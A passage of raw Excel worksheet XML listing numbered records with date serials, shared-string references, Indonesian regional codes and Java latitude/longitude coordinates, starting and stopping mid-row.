        <v>0.50254629629629632</v>
      </c>
      <c r="D2782" t="s">
        <v>22</v>
      </c>
      <c r="E2782" t="s">
        <v>23</v>
      </c>
      <c r="F2782" t="s">
        <v>9422</v>
      </c>
      <c r="H2782" t="s">
        <v>7086</v>
      </c>
      <c r="I2782" t="s">
        <v>7087</v>
      </c>
      <c r="J2782" t="s">
        <v>2627</v>
      </c>
      <c r="L2782" t="s">
        <v>9423</v>
      </c>
      <c r="M2782">
        <v>3216061001</v>
      </c>
      <c r="N2782">
        <v>3216061</v>
      </c>
      <c r="O2782">
        <v>3216</v>
      </c>
      <c r="P2782">
        <v>32</v>
      </c>
      <c r="Q2782" t="s">
        <v>9424</v>
      </c>
      <c r="R2782" t="s">
        <v>55</v>
      </c>
      <c r="S2782" t="s">
        <v>41</v>
      </c>
      <c r="T2782" t="s">
        <v>42</v>
      </c>
      <c r="U2782" s="5">
        <v>10711789</v>
      </c>
      <c r="V2782" s="5" t="s">
        <v>16951</v>
      </c>
      <c r="W2782" s="5">
        <v>-629178</v>
      </c>
      <c r="X2782" t="s">
        <v>20689</v>
      </c>
      <c r="Y2782" t="str">
        <f t="shared" si="43"/>
        <v>-6.29178,107.11789</v>
      </c>
    </row>
    <row r="2783" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2783">
        <v>227834</v>
      </c>
      <c r="B2783" s="1">
        <v>44223</v>
      </c>
      <c r="C2783" s="2">
        <v>0.67453703703703705</v>
      </c>
      <c r="D2783" t="s">
        <v>22</v>
      </c>
      <c r="E2783" t="s">
        <v>23</v>
      </c>
      <c r="F2783" t="s">
        <v>9425</v>
      </c>
      <c r="G2783" t="s">
        <v>9426</v>
      </c>
      <c r="H2783" t="s">
        <v>9262</v>
      </c>
      <c r="I2783" t="s">
        <v>9427</v>
      </c>
      <c r="J2783" t="s">
        <v>2615</v>
      </c>
      <c r="L2783" t="s">
        <v>9428</v>
      </c>
      <c r="M2783">
        <v>3404170004</v>
      </c>
      <c r="N2783">
        <v>3404170</v>
      </c>
      <c r="O2783">
        <v>3404</v>
      </c>
      <c r="P2783">
        <v>34</v>
      </c>
      <c r="Q2783" t="s">
        <v>9429</v>
      </c>
      <c r="R2783" t="s">
        <v>9430</v>
      </c>
      <c r="S2783" t="s">
        <v>1855</v>
      </c>
      <c r="T2783" t="s">
        <v>1856</v>
      </c>
      <c r="U2783" s="5">
        <v>11044888</v>
      </c>
      <c r="V2783" s="5" t="s">
        <v>16952</v>
      </c>
      <c r="W2783" s="5">
        <v>-758460</v>
      </c>
      <c r="X2783" t="s">
        <v>20690</v>
      </c>
      <c r="Y2783" t="str">
        <f t="shared" si="43"/>
        <v>-7.58460,110.44888</v>
      </c>
    </row>
    <row r="2784" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2784">
        <v>227835</v>
      </c>
      <c r="B2784" s="1">
        <v>44223</v>
      </c>
      <c r="C2784" s="2">
        <v>0.67748842592592595</v>
      </c>
      <c r="D2784" t="s">
        <v>22</v>
      </c>
      <c r="E2784" t="s">
        <v>23</v>
      </c>
      <c r="F2784" t="s">
        <v>9431</v>
      </c>
      <c r="G2784" t="s">
        <v>9432</v>
      </c>
      <c r="H2784" t="s">
        <v>9262</v>
      </c>
      <c r="I2784" t="s">
        <v>9427</v>
      </c>
      <c r="J2784" t="s">
        <v>2608</v>
      </c>
      <c r="L2784" t="s">
        <v>9433</v>
      </c>
      <c r="M2784">
        <v>3310230013</v>
      </c>
      <c r="N2784">
        <v>3310230</v>
      </c>
      <c r="O2784">
        <v>3310</v>
      </c>
      <c r="P2784">
        <v>33</v>
      </c>
      <c r="Q2784" t="s">
        <v>9434</v>
      </c>
      <c r="R2784" t="s">
        <v>9435</v>
      </c>
      <c r="S2784" t="s">
        <v>6315</v>
      </c>
      <c r="T2784" t="s">
        <v>1134</v>
      </c>
      <c r="U2784" s="5">
        <v>11046755</v>
      </c>
      <c r="V2784" s="5" t="s">
        <v>16953</v>
      </c>
      <c r="W2784" s="5">
        <v>-756760</v>
      </c>
      <c r="X2784" t="s">
        <v>20691</v>
      </c>
      <c r="Y2784" t="str">
        <f t="shared" si="43"/>
        <v>-7.56760,110.46755</v>
      </c>
    </row>
    <row r="2785" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2785">
        <v>227838</v>
      </c>
      <c r="B2785" s="1">
        <v>44224</v>
      </c>
      <c r="C2785" s="2">
        <v>0.28215277777777775</v>
      </c>
      <c r="D2785" t="s">
        <v>22</v>
      </c>
      <c r="E2785" t="s">
        <v>23</v>
      </c>
      <c r="F2785" t="s">
        <v>9436</v>
      </c>
      <c r="G2785" t="s">
        <v>9437</v>
      </c>
      <c r="H2785" t="s">
        <v>26</v>
      </c>
      <c r="I2785" t="s">
        <v>3042</v>
      </c>
      <c r="J2785" t="s">
        <v>3135</v>
      </c>
      <c r="L2785" t="s">
        <v>9438</v>
      </c>
      <c r="M2785">
        <v>3603120010</v>
      </c>
      <c r="N2785">
        <v>3603120</v>
      </c>
      <c r="O2785">
        <v>3603</v>
      </c>
      <c r="P2785">
        <v>36</v>
      </c>
      <c r="Q2785" t="s">
        <v>9439</v>
      </c>
      <c r="R2785" t="s">
        <v>6219</v>
      </c>
      <c r="S2785" t="s">
        <v>201</v>
      </c>
      <c r="T2785" t="s">
        <v>171</v>
      </c>
      <c r="U2785" s="5">
        <v>10656874</v>
      </c>
      <c r="V2785" s="5" t="s">
        <v>16954</v>
      </c>
      <c r="W2785" s="5">
        <v>-615601</v>
      </c>
      <c r="X2785" t="s">
        <v>20692</v>
      </c>
      <c r="Y2785" t="str">
        <f t="shared" si="43"/>
        <v>-6.15601,106.56874</v>
      </c>
    </row>
    <row r="2786" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2786">
        <v>227839</v>
      </c>
      <c r="B2786" s="1">
        <v>44224</v>
      </c>
      <c r="C2786" s="2">
        <v>0.30024305555555558</v>
      </c>
      <c r="D2786" t="s">
        <v>22</v>
      </c>
      <c r="E2786" t="s">
        <v>23</v>
      </c>
      <c r="F2786" t="s">
        <v>9440</v>
      </c>
      <c r="G2786" t="s">
        <v>9441</v>
      </c>
      <c r="H2786" t="s">
        <v>9262</v>
      </c>
      <c r="I2786" t="s">
        <v>9442</v>
      </c>
      <c r="J2786" t="s">
        <v>2608</v>
      </c>
      <c r="L2786" t="s">
        <v>9443</v>
      </c>
      <c r="M2786">
        <v>3310230011</v>
      </c>
      <c r="N2786">
        <v>3310230</v>
      </c>
      <c r="O2786">
        <v>3310</v>
      </c>
      <c r="P2786">
        <v>33</v>
      </c>
      <c r="Q2786" t="s">
        <v>9444</v>
      </c>
      <c r="R2786" t="s">
        <v>9435</v>
      </c>
      <c r="S2786" t="s">
        <v>6315</v>
      </c>
      <c r="T2786" t="s">
        <v>1134</v>
      </c>
      <c r="U2786" s="5">
        <v>11047337</v>
      </c>
      <c r="V2786" s="5" t="s">
        <v>16955</v>
      </c>
      <c r="W2786" s="5">
        <v>-758875</v>
      </c>
      <c r="X2786" t="s">
        <v>20693</v>
      </c>
      <c r="Y2786" t="str">
        <f t="shared" si="43"/>
        <v>-7.58875,110.47337</v>
      </c>
    </row>
    <row r="2787" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2787">
        <v>227840</v>
      </c>
      <c r="B2787" s="1">
        <v>44224</v>
      </c>
      <c r="C2787" s="2">
        <v>0.75958333333333339</v>
      </c>
      <c r="D2787" t="s">
        <v>22</v>
      </c>
      <c r="E2787" t="s">
        <v>23</v>
      </c>
      <c r="F2787" t="s">
        <v>9445</v>
      </c>
      <c r="G2787" t="s">
        <v>9446</v>
      </c>
      <c r="H2787" t="s">
        <v>26</v>
      </c>
      <c r="I2787" t="s">
        <v>137</v>
      </c>
      <c r="J2787" t="s">
        <v>2608</v>
      </c>
      <c r="L2787" t="s">
        <v>9447</v>
      </c>
      <c r="M2787">
        <v>3324130015</v>
      </c>
      <c r="N2787">
        <v>3324130</v>
      </c>
      <c r="O2787">
        <v>3324</v>
      </c>
      <c r="P2787">
        <v>33</v>
      </c>
      <c r="Q2787" t="s">
        <v>9448</v>
      </c>
      <c r="R2787" t="s">
        <v>9449</v>
      </c>
      <c r="S2787" t="s">
        <v>7074</v>
      </c>
      <c r="T2787" t="s">
        <v>1134</v>
      </c>
      <c r="U2787" s="5">
        <v>11004897</v>
      </c>
      <c r="V2787" s="5" t="s">
        <v>16956</v>
      </c>
      <c r="W2787" s="5">
        <v>-691851</v>
      </c>
      <c r="X2787" t="s">
        <v>20694</v>
      </c>
      <c r="Y2787" t="str">
        <f t="shared" si="43"/>
        <v>-6.91851,110.04897</v>
      </c>
    </row>
    <row r="2788" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2788">
        <v>227841</v>
      </c>
      <c r="B2788" s="1">
        <v>44224</v>
      </c>
      <c r="C2788" s="2">
        <v>0.7895833333333333</v>
      </c>
      <c r="D2788" t="s">
        <v>2648</v>
      </c>
      <c r="E2788" t="s">
        <v>23</v>
      </c>
      <c r="G2788" t="s">
        <v>9450</v>
      </c>
      <c r="H2788" t="s">
        <v>26</v>
      </c>
      <c r="J2788" t="s">
        <v>9451</v>
      </c>
      <c r="L2788" t="s">
        <v>9452</v>
      </c>
      <c r="M2788">
        <v>3174010003</v>
      </c>
      <c r="N2788">
        <v>3174010</v>
      </c>
      <c r="O2788">
        <v>3174</v>
      </c>
      <c r="P2788">
        <v>31</v>
      </c>
      <c r="Q2788" t="s">
        <v>5732</v>
      </c>
      <c r="R2788" t="s">
        <v>69</v>
      </c>
      <c r="S2788" t="s">
        <v>32</v>
      </c>
      <c r="T2788" t="s">
        <v>33</v>
      </c>
      <c r="U2788" s="5">
        <v>10672584</v>
      </c>
      <c r="V2788" s="5" t="s">
        <v>16957</v>
      </c>
      <c r="W2788" s="5">
        <v>-621270</v>
      </c>
      <c r="X2788" t="s">
        <v>20695</v>
      </c>
      <c r="Y2788" t="str">
        <f t="shared" si="43"/>
        <v>-6.21270,106.72584</v>
      </c>
    </row>
    <row r="2789" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2789">
        <v>227925</v>
      </c>
      <c r="B2789" s="1">
        <v>44225</v>
      </c>
      <c r="C2789" s="2">
        <v>8.0613425925925922E-2</v>
      </c>
      <c r="D2789" t="s">
        <v>22</v>
      </c>
      <c r="E2789" t="s">
        <v>23</v>
      </c>
      <c r="F2789" t="s">
        <v>9453</v>
      </c>
      <c r="G2789" t="s">
        <v>9454</v>
      </c>
      <c r="H2789" t="s">
        <v>26</v>
      </c>
      <c r="I2789" t="s">
        <v>1359</v>
      </c>
      <c r="J2789" t="s">
        <v>2622</v>
      </c>
      <c r="L2789" t="s">
        <v>9455</v>
      </c>
      <c r="M2789">
        <v>3523090008</v>
      </c>
      <c r="N2789">
        <v>3523090</v>
      </c>
      <c r="O2789">
        <v>3523</v>
      </c>
      <c r="P2789">
        <v>35</v>
      </c>
      <c r="Q2789" t="s">
        <v>9456</v>
      </c>
      <c r="R2789" t="s">
        <v>7078</v>
      </c>
      <c r="S2789" t="s">
        <v>7079</v>
      </c>
      <c r="T2789" t="s">
        <v>1221</v>
      </c>
      <c r="U2789" s="5">
        <v>11210789</v>
      </c>
      <c r="V2789" s="5" t="s">
        <v>16958</v>
      </c>
      <c r="W2789" s="5">
        <v>-707234</v>
      </c>
      <c r="X2789" t="s">
        <v>20696</v>
      </c>
      <c r="Y2789" t="str">
        <f t="shared" si="43"/>
        <v>-7.07234,112.10789</v>
      </c>
    </row>
    <row r="2790" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2790">
        <v>228018</v>
      </c>
      <c r="B2790" s="1">
        <v>44225</v>
      </c>
      <c r="C2790" s="2">
        <v>0.34722222222222227</v>
      </c>
      <c r="D2790" t="s">
        <v>2648</v>
      </c>
      <c r="E2790" t="s">
        <v>23</v>
      </c>
      <c r="G2790" t="s">
        <v>9457</v>
      </c>
      <c r="H2790" t="s">
        <v>26</v>
      </c>
      <c r="J2790" t="s">
        <v>3199</v>
      </c>
      <c r="L2790" t="s">
        <v>9458</v>
      </c>
      <c r="M2790">
        <v>3172070001</v>
      </c>
      <c r="N2790">
        <v>3172070</v>
      </c>
      <c r="O2790">
        <v>3172</v>
      </c>
      <c r="P2790">
        <v>31</v>
      </c>
      <c r="Q2790" t="s">
        <v>127</v>
      </c>
      <c r="R2790" t="s">
        <v>128</v>
      </c>
      <c r="S2790" t="s">
        <v>49</v>
      </c>
      <c r="T2790" t="s">
        <v>33</v>
      </c>
      <c r="U2790" s="5">
        <v>10690456</v>
      </c>
      <c r="V2790" s="5" t="s">
        <v>16959</v>
      </c>
      <c r="W2790" s="5">
        <v>-623464</v>
      </c>
      <c r="X2790" t="s">
        <v>20697</v>
      </c>
      <c r="Y2790" t="str">
        <f t="shared" si="43"/>
        <v>-6.23464,106.90456</v>
      </c>
    </row>
    <row r="2791" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2791">
        <v>228247</v>
      </c>
      <c r="B2791" s="1">
        <v>44225</v>
      </c>
      <c r="C2791" s="2">
        <v>0.77200231481481485</v>
      </c>
      <c r="D2791" t="s">
        <v>22</v>
      </c>
      <c r="E2791" t="s">
        <v>23</v>
      </c>
      <c r="F2791" t="s">
        <v>9459</v>
      </c>
      <c r="G2791" t="s">
        <v>9460</v>
      </c>
      <c r="H2791" t="s">
        <v>26</v>
      </c>
      <c r="I2791" t="s">
        <v>5752</v>
      </c>
      <c r="J2791" t="s">
        <v>2622</v>
      </c>
      <c r="M2791">
        <v>3509720005</v>
      </c>
      <c r="N2791">
        <v>3509720</v>
      </c>
      <c r="O2791">
        <v>3509</v>
      </c>
      <c r="P2791">
        <v>35</v>
      </c>
      <c r="Q2791" t="s">
        <v>1801</v>
      </c>
      <c r="R2791" t="s">
        <v>1801</v>
      </c>
      <c r="S2791" t="s">
        <v>6492</v>
      </c>
      <c r="T2791" t="s">
        <v>1221</v>
      </c>
      <c r="U2791" s="5">
        <v>11370485</v>
      </c>
      <c r="V2791" s="5" t="s">
        <v>16960</v>
      </c>
      <c r="W2791" s="5">
        <v>-817747</v>
      </c>
      <c r="X2791" t="s">
        <v>20698</v>
      </c>
      <c r="Y2791" t="str">
        <f t="shared" si="43"/>
        <v>-8.17747,113.70485</v>
      </c>
    </row>
    <row r="2792" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2792">
        <v>228444</v>
      </c>
      <c r="B2792" s="1">
        <v>44226</v>
      </c>
      <c r="C2792" s="2">
        <v>0.12920138888888888</v>
      </c>
      <c r="D2792" t="s">
        <v>22</v>
      </c>
      <c r="E2792" t="s">
        <v>23</v>
      </c>
      <c r="F2792" t="s">
        <v>9461</v>
      </c>
      <c r="H2792" t="s">
        <v>7978</v>
      </c>
      <c r="I2792" t="s">
        <v>7979</v>
      </c>
      <c r="J2792" t="s">
        <v>2622</v>
      </c>
      <c r="L2792" t="s">
        <v>9462</v>
      </c>
      <c r="M2792">
        <v>3571010007</v>
      </c>
      <c r="N2792">
        <v>3571010</v>
      </c>
      <c r="O2792">
        <v>3571</v>
      </c>
      <c r="P2792">
        <v>35</v>
      </c>
      <c r="Q2792" t="s">
        <v>9255</v>
      </c>
      <c r="R2792" t="s">
        <v>8660</v>
      </c>
      <c r="S2792" t="s">
        <v>8365</v>
      </c>
      <c r="T2792" t="s">
        <v>1221</v>
      </c>
      <c r="U2792" s="5">
        <v>11200639</v>
      </c>
      <c r="V2792" s="5" t="s">
        <v>16961</v>
      </c>
      <c r="W2792" s="5">
        <v>-782391</v>
      </c>
      <c r="X2792" t="s">
        <v>20699</v>
      </c>
      <c r="Y2792" t="str">
        <f t="shared" si="43"/>
        <v>-7.82391,112.00639</v>
      </c>
    </row>
    <row r="2793" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2793">
        <v>228451</v>
      </c>
      <c r="B2793" s="1">
        <v>44226</v>
      </c>
      <c r="C2793" s="2">
        <v>0.12340277777777779</v>
      </c>
      <c r="D2793" t="s">
        <v>85</v>
      </c>
      <c r="E2793" t="s">
        <v>23</v>
      </c>
      <c r="F2793" t="s">
        <v>9463</v>
      </c>
      <c r="G2793" t="s">
        <v>9464</v>
      </c>
      <c r="H2793" t="s">
        <v>26</v>
      </c>
      <c r="J2793" t="s">
        <v>2627</v>
      </c>
      <c r="K2793" t="s">
        <v>9465</v>
      </c>
      <c r="L2793" t="s">
        <v>9466</v>
      </c>
      <c r="M2793">
        <v>3275010010</v>
      </c>
      <c r="N2793">
        <v>3275010</v>
      </c>
      <c r="O2793">
        <v>3275</v>
      </c>
      <c r="P2793">
        <v>32</v>
      </c>
      <c r="Q2793" t="s">
        <v>286</v>
      </c>
      <c r="R2793" t="s">
        <v>287</v>
      </c>
      <c r="S2793" t="s">
        <v>41</v>
      </c>
      <c r="T2793" t="s">
        <v>42</v>
      </c>
      <c r="U2793" s="5">
        <v>10694407</v>
      </c>
      <c r="V2793" s="5" t="s">
        <v>16220</v>
      </c>
      <c r="W2793" s="5">
        <v>-625296</v>
      </c>
      <c r="X2793" t="s">
        <v>20700</v>
      </c>
      <c r="Y2793" t="str">
        <f t="shared" si="43"/>
        <v>-6.25296,106.94407</v>
      </c>
    </row>
    <row r="2794" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2794">
        <v>228455</v>
      </c>
      <c r="B2794" s="1">
        <v>44226</v>
      </c>
      <c r="C2794" s="2">
        <v>0.14056712962962961</v>
      </c>
      <c r="D2794" t="s">
        <v>22</v>
      </c>
      <c r="E2794" t="s">
        <v>23</v>
      </c>
      <c r="F2794" t="s">
        <v>9467</v>
      </c>
      <c r="G2794" t="s">
        <v>9468</v>
      </c>
      <c r="H2794" t="s">
        <v>7978</v>
      </c>
      <c r="I2794" t="s">
        <v>7979</v>
      </c>
      <c r="J2794" t="s">
        <v>1656</v>
      </c>
      <c r="M2794">
        <v>3173080003</v>
      </c>
      <c r="N2794">
        <v>3173080</v>
      </c>
      <c r="O2794">
        <v>3173</v>
      </c>
      <c r="P2794">
        <v>31</v>
      </c>
      <c r="Q2794" t="s">
        <v>157</v>
      </c>
      <c r="R2794" t="s">
        <v>157</v>
      </c>
      <c r="S2794" t="s">
        <v>62</v>
      </c>
      <c r="T2794" t="s">
        <v>33</v>
      </c>
      <c r="U2794" s="5">
        <v>10682753</v>
      </c>
      <c r="V2794" s="5" t="s">
        <v>16962</v>
      </c>
      <c r="W2794" s="5">
        <v>-617399</v>
      </c>
      <c r="X2794" t="s">
        <v>20701</v>
      </c>
      <c r="Y2794" t="str">
        <f t="shared" si="43"/>
        <v>-6.17399,106.82753</v>
      </c>
    </row>
    <row r="2795" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2795">
        <v>228464</v>
      </c>
      <c r="B2795" s="1">
        <v>44226</v>
      </c>
      <c r="C2795" s="2">
        <v>0.15103009259259259</v>
      </c>
      <c r="D2795" t="s">
        <v>22</v>
      </c>
      <c r="E2795" t="s">
        <v>23</v>
      </c>
      <c r="F2795" t="s">
        <v>9469</v>
      </c>
      <c r="G2795" t="s">
        <v>9470</v>
      </c>
      <c r="H2795" t="s">
        <v>7978</v>
      </c>
      <c r="I2795" t="s">
        <v>7979</v>
      </c>
      <c r="J2795" t="s">
        <v>2622</v>
      </c>
      <c r="L2795" t="s">
        <v>9471</v>
      </c>
      <c r="M2795">
        <v>3579010001</v>
      </c>
      <c r="N2795">
        <v>3579010</v>
      </c>
      <c r="O2795">
        <v>3579</v>
      </c>
      <c r="P2795">
        <v>35</v>
      </c>
      <c r="Q2795" t="s">
        <v>9472</v>
      </c>
      <c r="R2795" t="s">
        <v>9473</v>
      </c>
      <c r="S2795" t="s">
        <v>9473</v>
      </c>
      <c r="T2795" t="s">
        <v>1221</v>
      </c>
      <c r="U2795" s="5">
        <v>11251933</v>
      </c>
      <c r="V2795" s="5" t="s">
        <v>16963</v>
      </c>
      <c r="W2795" s="5">
        <v>-789774</v>
      </c>
      <c r="X2795" t="s">
        <v>20702</v>
      </c>
      <c r="Y2795" t="str">
        <f t="shared" si="43"/>
        <v>-7.89774,112.51933</v>
      </c>
    </row>
    <row r="2796" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2796">
        <v>228472</v>
      </c>
      <c r="B2796" s="1">
        <v>44226</v>
      </c>
      <c r="C2796" s="2">
        <v>0.16333333333333333</v>
      </c>
      <c r="D2796" t="s">
        <v>22</v>
      </c>
      <c r="E2796" t="s">
        <v>23</v>
      </c>
      <c r="F2796" t="s">
        <v>9474</v>
      </c>
      <c r="G2796" t="s">
        <v>9475</v>
      </c>
      <c r="H2796" t="s">
        <v>9262</v>
      </c>
      <c r="I2796" t="s">
        <v>9427</v>
      </c>
      <c r="J2796" t="s">
        <v>2622</v>
      </c>
      <c r="L2796" t="s">
        <v>9476</v>
      </c>
      <c r="M2796">
        <v>3510171008</v>
      </c>
      <c r="N2796">
        <v>3510171</v>
      </c>
      <c r="O2796">
        <v>3510</v>
      </c>
      <c r="P2796">
        <v>35</v>
      </c>
      <c r="Q2796" t="s">
        <v>9477</v>
      </c>
      <c r="R2796" t="s">
        <v>9478</v>
      </c>
      <c r="S2796" t="s">
        <v>8370</v>
      </c>
      <c r="T2796" t="s">
        <v>1221</v>
      </c>
      <c r="U2796" s="5">
        <v>11426194</v>
      </c>
      <c r="V2796" s="5" t="s">
        <v>16964</v>
      </c>
      <c r="W2796" s="5">
        <v>-806265</v>
      </c>
      <c r="X2796" t="s">
        <v>20703</v>
      </c>
      <c r="Y2796" t="str">
        <f t="shared" si="43"/>
        <v>-8.06265,114.26194</v>
      </c>
    </row>
    <row r="2797" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2797">
        <v>228564</v>
      </c>
      <c r="B2797" s="1">
        <v>44226</v>
      </c>
      <c r="C2797" s="2">
        <v>0.30902777777777779</v>
      </c>
      <c r="D2797" t="s">
        <v>2648</v>
      </c>
      <c r="E2797" t="s">
        <v>23</v>
      </c>
      <c r="G2797" t="s">
        <v>9479</v>
      </c>
      <c r="H2797" t="s">
        <v>26</v>
      </c>
      <c r="J2797" t="s">
        <v>9480</v>
      </c>
      <c r="L2797" t="s">
        <v>9481</v>
      </c>
      <c r="M2797">
        <v>3174080003</v>
      </c>
      <c r="N2797">
        <v>3174080</v>
      </c>
      <c r="O2797">
        <v>3174</v>
      </c>
      <c r="P2797">
        <v>31</v>
      </c>
      <c r="Q2797" t="s">
        <v>1700</v>
      </c>
      <c r="R2797" t="s">
        <v>695</v>
      </c>
      <c r="S2797" t="s">
        <v>32</v>
      </c>
      <c r="T2797" t="s">
        <v>33</v>
      </c>
      <c r="U2797" s="5">
        <v>10669434</v>
      </c>
      <c r="V2797" s="5" t="s">
        <v>16965</v>
      </c>
      <c r="W2797" s="5">
        <v>-612521</v>
      </c>
      <c r="X2797" t="s">
        <v>20704</v>
      </c>
      <c r="Y2797" t="str">
        <f t="shared" si="43"/>
        <v>-6.12521,106.69434</v>
      </c>
    </row>
    <row r="2798" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2798">
        <v>228566</v>
      </c>
      <c r="B2798" s="1">
        <v>44226</v>
      </c>
      <c r="C2798" s="2">
        <v>0.3125</v>
      </c>
      <c r="D2798" t="s">
        <v>2648</v>
      </c>
      <c r="E2798" t="s">
        <v>23</v>
      </c>
      <c r="G2798" t="s">
        <v>9482</v>
      </c>
      <c r="H2798" t="s">
        <v>26</v>
      </c>
      <c r="J2798" t="s">
        <v>9480</v>
      </c>
      <c r="L2798" t="s">
        <v>9483</v>
      </c>
      <c r="M2798">
        <v>3174080003</v>
      </c>
      <c r="N2798">
        <v>3174080</v>
      </c>
      <c r="O2798">
        <v>3174</v>
      </c>
      <c r="P2798">
        <v>31</v>
      </c>
      <c r="Q2798" t="s">
        <v>1700</v>
      </c>
      <c r="R2798" t="s">
        <v>695</v>
      </c>
      <c r="S2798" t="s">
        <v>32</v>
      </c>
      <c r="T2798" t="s">
        <v>33</v>
      </c>
      <c r="U2798" s="5">
        <v>10669439</v>
      </c>
      <c r="V2798" s="5" t="s">
        <v>16966</v>
      </c>
      <c r="W2798" s="5">
        <v>-612515</v>
      </c>
      <c r="X2798" t="s">
        <v>20705</v>
      </c>
      <c r="Y2798" t="str">
        <f t="shared" si="43"/>
        <v>-6.12515,106.69439</v>
      </c>
    </row>
    <row r="2799" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2799">
        <v>228569</v>
      </c>
      <c r="B2799" s="1">
        <v>44226</v>
      </c>
      <c r="C2799" s="2">
        <v>0.31111111111111112</v>
      </c>
      <c r="D2799" t="s">
        <v>2648</v>
      </c>
      <c r="E2799" t="s">
        <v>23</v>
      </c>
      <c r="G2799" t="s">
        <v>9484</v>
      </c>
      <c r="H2799" t="s">
        <v>26</v>
      </c>
      <c r="J2799" t="s">
        <v>9480</v>
      </c>
      <c r="L2799" t="s">
        <v>9485</v>
      </c>
      <c r="M2799">
        <v>3174080003</v>
      </c>
      <c r="N2799">
        <v>3174080</v>
      </c>
      <c r="O2799">
        <v>3174</v>
      </c>
      <c r="P2799">
        <v>31</v>
      </c>
      <c r="Q2799" t="s">
        <v>1700</v>
      </c>
      <c r="R2799" t="s">
        <v>695</v>
      </c>
      <c r="S2799" t="s">
        <v>32</v>
      </c>
      <c r="T2799" t="s">
        <v>33</v>
      </c>
      <c r="U2799" s="5">
        <v>10669442</v>
      </c>
      <c r="V2799" s="5" t="s">
        <v>16967</v>
      </c>
      <c r="W2799" s="5">
        <v>-612517</v>
      </c>
      <c r="X2799" t="s">
        <v>20706</v>
      </c>
      <c r="Y2799" t="str">
        <f t="shared" si="43"/>
        <v>-6.12517,106.69442</v>
      </c>
    </row>
    <row r="2800" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2800">
        <v>228578</v>
      </c>
      <c r="B2800" s="1">
        <v>44226</v>
      </c>
      <c r="C2800" s="2">
        <v>0.32013888888888892</v>
      </c>
      <c r="D2800" t="s">
        <v>2648</v>
      </c>
      <c r="E2800" t="s">
        <v>23</v>
      </c>
      <c r="G2800" t="s">
        <v>9486</v>
      </c>
      <c r="H2800" t="s">
        <v>26</v>
      </c>
      <c r="J2800" t="s">
        <v>9480</v>
      </c>
      <c r="L2800" t="s">
        <v>9487</v>
      </c>
      <c r="M2800">
        <v>3174080003</v>
      </c>
      <c r="N2800">
        <v>3174080</v>
      </c>
      <c r="O2800">
        <v>3174</v>
      </c>
      <c r="P2800">
        <v>31</v>
      </c>
      <c r="Q2800" t="s">
        <v>1700</v>
      </c>
      <c r="R2800" t="s">
        <v>695</v>
      </c>
      <c r="S2800" t="s">
        <v>32</v>
      </c>
      <c r="T2800" t="s">
        <v>33</v>
      </c>
      <c r="U2800" s="5">
        <v>10669434</v>
      </c>
      <c r="V2800" s="5" t="s">
        <v>16965</v>
      </c>
      <c r="W2800" s="5">
        <v>-612521</v>
      </c>
      <c r="X2800" t="s">
        <v>20704</v>
      </c>
      <c r="Y2800" t="str">
        <f t="shared" si="43"/>
        <v>-6.12521,106.69434</v>
      </c>
    </row>
    <row r="2801" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2801">
        <v>228653</v>
      </c>
      <c r="B2801" s="1">
        <v>44226</v>
      </c>
      <c r="C2801" s="2">
        <v>0.38271990740740741</v>
      </c>
      <c r="D2801" t="s">
        <v>22</v>
      </c>
      <c r="E2801" t="s">
        <v>23</v>
      </c>
      <c r="F2801" t="s">
        <v>9488</v>
      </c>
      <c r="G2801" t="s">
        <v>9489</v>
      </c>
      <c r="H2801" t="s">
        <v>7086</v>
      </c>
      <c r="I2801" t="s">
        <v>9490</v>
      </c>
      <c r="J2801" t="s">
        <v>1656</v>
      </c>
      <c r="L2801" t="s">
        <v>9491</v>
      </c>
      <c r="M2801">
        <v>3173080003</v>
      </c>
      <c r="N2801">
        <v>3173080</v>
      </c>
      <c r="O2801">
        <v>3173</v>
      </c>
      <c r="P2801">
        <v>31</v>
      </c>
      <c r="Q2801" t="s">
        <v>157</v>
      </c>
      <c r="R2801" t="s">
        <v>157</v>
      </c>
      <c r="S2801" t="s">
        <v>62</v>
      </c>
      <c r="T2801" t="s">
        <v>33</v>
      </c>
      <c r="U2801" s="5">
        <v>10682762</v>
      </c>
      <c r="V2801" s="5" t="s">
        <v>16968</v>
      </c>
      <c r="W2801" s="5">
        <v>-617499</v>
      </c>
      <c r="X2801" t="s">
        <v>20707</v>
      </c>
      <c r="Y2801" t="str">
        <f t="shared" si="43"/>
        <v>-6.17499,106.82762</v>
      </c>
    </row>
    <row r="2802" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2802">
        <v>229003</v>
      </c>
      <c r="B2802" s="1">
        <v>44226</v>
      </c>
      <c r="C2802" s="2">
        <v>0.67675925925925917</v>
      </c>
      <c r="D2802" t="s">
        <v>22</v>
      </c>
      <c r="E2802" t="s">
        <v>23</v>
      </c>
      <c r="F2802" t="s">
        <v>9492</v>
      </c>
      <c r="H2802" t="s">
        <v>26</v>
      </c>
      <c r="I2802" t="s">
        <v>1538</v>
      </c>
      <c r="J2802" t="s">
        <v>2608</v>
      </c>
      <c r="L2802" t="s">
        <v>9493</v>
      </c>
      <c r="M2802">
        <v>3315130004</v>
      </c>
      <c r="N2802">
        <v>3315130</v>
      </c>
      <c r="O2802">
        <v>3315</v>
      </c>
      <c r="P2802">
        <v>33</v>
      </c>
      <c r="Q2802" t="s">
        <v>9494</v>
      </c>
      <c r="R2802" t="s">
        <v>9495</v>
      </c>
      <c r="S2802" t="s">
        <v>1386</v>
      </c>
      <c r="T2802" t="s">
        <v>1134</v>
      </c>
      <c r="U2802" s="5">
        <v>11092098</v>
      </c>
      <c r="V2802" s="5" t="s">
        <v>16969</v>
      </c>
      <c r="W2802" s="5">
